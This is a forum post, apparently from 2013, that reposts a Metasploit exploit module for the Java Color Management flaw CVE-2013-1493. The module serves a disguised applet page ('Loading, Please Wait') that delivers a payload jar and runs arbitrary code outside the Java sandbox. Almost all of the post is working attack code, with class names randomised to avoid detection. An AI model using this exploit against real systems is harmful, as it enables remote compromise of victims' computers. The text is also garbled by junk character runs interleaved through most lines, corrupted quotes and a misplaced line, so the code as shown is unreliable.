##
0 K' Y1 q: N5 t: B$ n5 T& t3 a+ p+ {7 ] O. W2 I4 e
# This file is part of the Metasploit Framework and may be subject to
! P6 M y8 U, y7 V8 u' p* ^" }5 P# redistribution and commercial restrictions. Please see the Metasploit" [8 c6 C% \: A2 s8 {. y
# web site for more information on licensing and terms of use.: t0 H8 n: V& c' K- V v
# http://metasploit.com/. d; _% t3 _- h* B% M0 d+ d5 u# Z1 v |
##4 h" a/ \) A9 e T' [
require ‘msf/core’
. h* G" D; q, yrequire ‘rex’* I& S1 J# \/ J; S
class Metasploit3 < Msf::Exploit::Remote
9 m4 t/ L- A4 L! G" YRank = NormalRanking
_( O, m: a/ M# ]: W# @& [include Msf::Exploit::Remote::HttpServer::HTML6 O0 {% H3 Z; t/ c0 u& T
include Msf::Exploit::EXE
r& z' w3 f. h/ m! `2 x; c: e1 i% linclude Msf::Exploit::Remote::BrowserAutopwn
. p) Y0 ]3 S6 zautopwn_info({ :javascript => false }): m. R" U, t* I7 J! R' ~
def initialize( info = {} )" O! A5 T7 g8 Q0 g4 r x! u* [
super( update_info( info,. N4 Z" r. x$ z3 y, A
‘Name’ => ‘Java CMM Remote Code Execution’,
" ` x+ y1 A% O+ o+ U‘Description’ => %q{+ r4 m2 v2 K# V: U% B9 {5 {
This module abuses the Color Management classes from a Java Applet to run# {# d0 M0 s( w7 j7 b7 h/ M) m, N
arbitrary Java code outside of the sandbox as exploited in the wild in February
+ t- z# U2 n. j: W* j8 R- O6 land March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41" s; z+ K/ A" G$ V
and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
+ v, G2 I# C6 L$ {* S, Y: Ysystems. This exploit doesn’t bypass click-to-play, so the user must accept the java
" {1 k% X" m7 Q9 Y2 S% swarning in order to run the malicious applet.
# o5 J: S* ^; c7 a& s},
. @" W( K! o+ z: Z‘License’ => MSF_LICENSE,; \8 J8 x: e8 z; }% ?3 D' D
‘Author’ =>- P, j3 r9 V, L) J8 q6 c# g
'Unknown', # Vulnerability discovery and Exploit5 }( K3 q( S% T/ j! K
'juan vazquez' # Metasploit module (just ported the published exploit)
5 S1 i: r; ]5 a [' Z. B3 N J],2 c6 W/ `: }3 A6 {
‘References’ =>! U* a5 j! |- C+ C
[5 b, F7 z& X! p1 f1 [
[ 'CVE', '2013-1493' ],
& K& W& ?5 t, g[ 'OSVDB', '90737' ],
" S3 b0 ^' e% s/ ~( m# h[ 'BID', '58238' ],
: e# t9 L: q5 R& J5 C6 v' b[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],1 |' G( A0 W% g" t$ A) Q
[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
% H9 q; S3 H# r b1 g0 F[ 'URL', 'http://pastie.org/pastes/6581034' ]
4 P/ @- M; ]8 M/ ]: b- A2 r* C$ Q! k2 @],! t+ g( c+ a4 R9 s3 J
‘Platform’ => [ 'win', 'java' ],
+ X9 v' k& R" @5 G$ ^& e [‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },+ @+ `2 w* O: i) x$ X3 K; E7 k2 K, a
‘Targets’ =>2 F: i6 Q$ z' N, E: Q: P/ a
[
. M/ \, M6 L' y$ m[ 'Generic (Java Payload)',
e+ D; k5 j0 [{
, I& r, ], N9 Z: Z# `1 g'Platform' => 'java',
: z! Q% o9 S M7 X+ L5 j* z'Arch' => ARCH_JAVA
: @6 O' d& Q* m; n}
, `2 D8 a: X! Y0 }* k8 X],
# q; j$ T9 g: o[ 'Windows x86 (Native Payload)',$ S+ I3 j( ]( n' n0 N2 k+ y
{. x( q# w+ x. L. M- T& U$ n, _
'Platform' => 'win',
/ h! r5 j4 J5 B4 Z'Arch' => ARCH_X86
) O4 u, o$ B' a5 p/ g0 @- V}. F5 {! L6 V) E/ g4 V. X5 f
]3 a U* {& W1 ?3 Z y; f8 t0 q& E
],
V/ w8 V+ T9 D$ @‘‘DisclosureDate’ => ‘Mar 01 2013′8 O9 K! G' F. R% c7 Q7 h
))$ l7 V5 k# {5 Z; b0 ~! N" u9 [% Q
end" ^( D7 {$ l3 S* \- q5 O
def setup3 i9 e. O0 A' `0 U( c
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)2 X, R: I& Q. f- t) ~( z0 W
@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
/ E8 x( {6 @' D% C( j/ e& Gpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)% i& i8 S w a7 l D
@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }9 ] q$ P$ _) V' K
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)
7 y2 c# `1 _! A# _" H# c2 T@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }6 u3 c/ F+ a) K3 O/ i
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)5 t- F4 K8 t8 i' A, |
@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }! J3 Y$ I: R, F' m/ D3 Y: D3 D
@init_class_name = rand_text_alpha(“Init”.length), J4 J+ L- U3 J) k
@init_class.gsub!(“Init”, @init_class_name)
; G! p( W' [' S; k }super
" o; A" G5 m2 x! t" M( H/ pend2 T" [1 {2 _; y" p, S
def on_request_uri(cli, request)
6 i8 {: ?7 g! Oprint_status(“handling request for #{request.uri}”)* P8 l; U9 [4 Z) l
case request.uri
% p% v* y& }+ F2 e4 L. ~' Z2 ^$ V+ Ywhen /\.jar$/i
, V6 z' x5 g3 Jjar = payload.encoded_jar4 z F: }, ?. ~! p( S% _0 r; o/ j
jar.add_file(“#{@init_class_name}.class”, @init_class)9 }5 k0 t( |6 U- E2 O; q
jar.add_file(“Leak.class”, @leak_class)1 `3 W6 ~1 l7 E+ z( l
jar.add_file(“MyBufferedImage.class”, @buffered_image_class)8 r; f! T" T# V5 q1 V; W( x# s
jar.add_file(“MyColorSpace.class”, @color_space_class)) v, w# ?/ X/ p" U9 M" w; I7 \
DefaultTarget’ => 1,0 ~# F7 q, F4 e; C3 s+ X! i& @0 [
metasploit_str = rand_text_alpha(“metasploit”.length). R8 {0 b. ^, c- W% |
payload_str = rand_text_alpha(“payload”.length)' _. `; K/ T# a( i$ D( q; y
jar.entries.each { |entry|6 a* ~3 u, @5 G! O, H" x$ @
entry.name.gsub!(“metasploit”, metasploit_str); ^1 o7 q/ ^$ `; \: Q9 A- g6 P
entry.name.gsub!(“Payload”, payload_str)& A" K. p: ^$ D: h1 M, h
entry.data = entry.data.gsub(“metasploit”, metasploit_str)! ?; p, o" `/ y% z( m8 [
entry.data = entry.data.gsub(“Payload”, payload_str)2 H5 z9 n. a9 n6 [6 d" e _
}
; [5 F2 D* L7 ]/ N1 hjar.build_manifest8 B: i1 S4 q# r( u
send_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })/ F& a/ n6 `2 b; d
when /\/$/
4 D$ w K# r: n6 `payload = regenerate_payload(cli)6 @! X. X5 v9 d6 \4 \- [" ^3 x
if not payload
! P7 ?( M( i. ?print_error(“Failed to generate the payload.”): p" l- d# G7 e+ J+ ?# J8 w( w4 t
send_not_found(cli)9 A* e0 n2 F4 I0 @. P+ P
return1 L. n. i c8 M: E5 J
end& R. p* m7 X; l
send_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })
8 n& I$ K& U1 P: z% Delse$ i( r7 X( ^. b/ e6 L
send_redirect(cli, get_resource() + ‘/’, ”)
6 K* m8 s0 Z' Z4 iend
~1 z( K- S, i4 e3 lend
* Y7 Y* z9 Y% U; ddef generate_html
" Q" a2 e. H* w, _) xhtml = %Q|<html><head><title>Loading, Please Wait…</title></head>|
7 l: F- R+ _1 I" y6 @html += %Q|<body><center><p>Loading, Please Wait…</p></center>|& T' @# Y) ]. L/ u: _
html += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|
8 i( D' ^# v6 {2 S& t: ]. Q6 Ghtml += %Q|</applet></body></html>|. y4 A5 a6 _( J. u0 P6 h
return html
4 n1 `( t) @0 E' s3 Q& @; qend8 u- ~5 H; B( N O, d4 Y% U
end
. i+ H$ T0 L' u+ z- y) w, }end
8 x% C/ n8 ]+ [( g2 g |
发表于 2013-4-4 17:31:17
收藏
支持
反对